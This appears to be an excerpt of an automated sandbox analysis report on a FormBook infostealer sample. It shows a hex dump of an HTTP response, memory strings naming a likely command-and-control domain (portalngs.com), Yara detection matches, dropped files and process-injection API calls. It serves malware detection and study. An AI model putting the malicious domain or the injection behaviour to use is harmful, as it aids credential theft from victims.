3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 30 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 6f 72 74 61 6c 6e 67 73 2e 63 6f 6d 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 38 0d 0a 77 65 62 6d 61 73 74 65 72 40 70 6f 72 74 61 6c 6e 67 73
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000002.495776403.0000000004BBB000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.487089974.0000000005019000.00000004.00000001.sdmpString found in binary or memory: http://www.portalngs.com
          Source: explorer.exe, 00000002.00000002.495776403.0000000004BBB000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.487089974.0000000005019000.00000004.00000001.sdmpString found in binary or memory: http://www.portalngs.com/3nk4/
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.243301176.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: rundll32.exe, 00000004.00000002.480914900.0000000000858000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_00424C58
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0043A784 GetKeyboardState,0_2_0043A784

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped file: C:\Users\user\AppData\Roaming\K4A5-D33\K4Alogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00458784 NtdllDefWindowProc_A,0_2_00458784
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture,0_2_0043D6BC
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00458F00
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00458FB0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,71CCB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0044D1BC
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419C90 NtCreateFile,1_2_00419C90
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419D40 NtReadFile,1_2_00419D40
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419DC0 NtClose,1_2_00419DC0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419E70 NtAllocateVirtualMemory,1_2_00419E70
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419C8A NtCreateFile,1_2_00419C8A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419D3A NtReadFile,1_2_00419D3A
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419DBA NtClose,1_2_00419DBA
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00419EEA NtAllocateVirtualMemory,1_2_00419EEA
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A798F0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A79860
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,1_2_00A79840
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,1_2_00A799A0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A79910
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,1_2_00A79A20
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A79A00
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,1_2_00A79A50
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A795D0 NtClose,LdrInitializeThunk,1_2_00A795D0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,1_2_00A79540
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A796E0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A79660
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A797A0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A79780
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A79710
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A798A0 NtWriteVirtualMemory,1_2_00A798A0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79820 NtEnumerateKey,1_2_00A79820
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A7B040 NtSuspendThread,1_2_00A7B040
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A799D0 NtCreateProcessEx,1_2_00A799D0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79950 NtQueueApcThread,1_2_00A79950
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79A80 NtOpenDirectoryObject,1_2_00A79A80
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79A10 NtQuerySection,1_2_00A79A10
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A7A3B0 NtGetContextThread,1_2_00A7A3B0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79B00 NtSetValueKey,1_2_00A79B00
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A795F0 NtQueryInformationFile,1_2_00A795F0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79520 NtWaitForSingleObject,1_2_00A79520
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A7AD30 NtSetContextThread,1_2_00A7AD30
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79560 NtWriteFile,1_2_00A79560
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A796D0 NtCreateKey,1_2_00A796D0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79610 NtEnumerateValueKey,1_2_00A79610
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79670 NtQueryInformationProcess,1_2_00A79670
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79650 NtQueryValueKey,1_2_00A79650
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79FE0 NtCreateMutant,1_2_00A79FE0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79730 NtQueryVirtualMemory,1_2_00A79730
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A7A710 NtOpenProcessToken,1_2_00A7A710
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79760 NtOpenProcess,1_2_00A79760
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A79770 NtSetInformationFile,1_2_00A79770
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_2_00A7A770 NtOpenThread,1_2_00A7A770
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_1_00419C90 NtCreateFile,1_1_00419C90
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_1_00419D40 NtReadFile,1_1_00419D40
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_1_00419DC0 NtClose,1_1_00419DC0
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 1_1_00419E70 NtAllocateVirtualMemory,1_1_00419E70
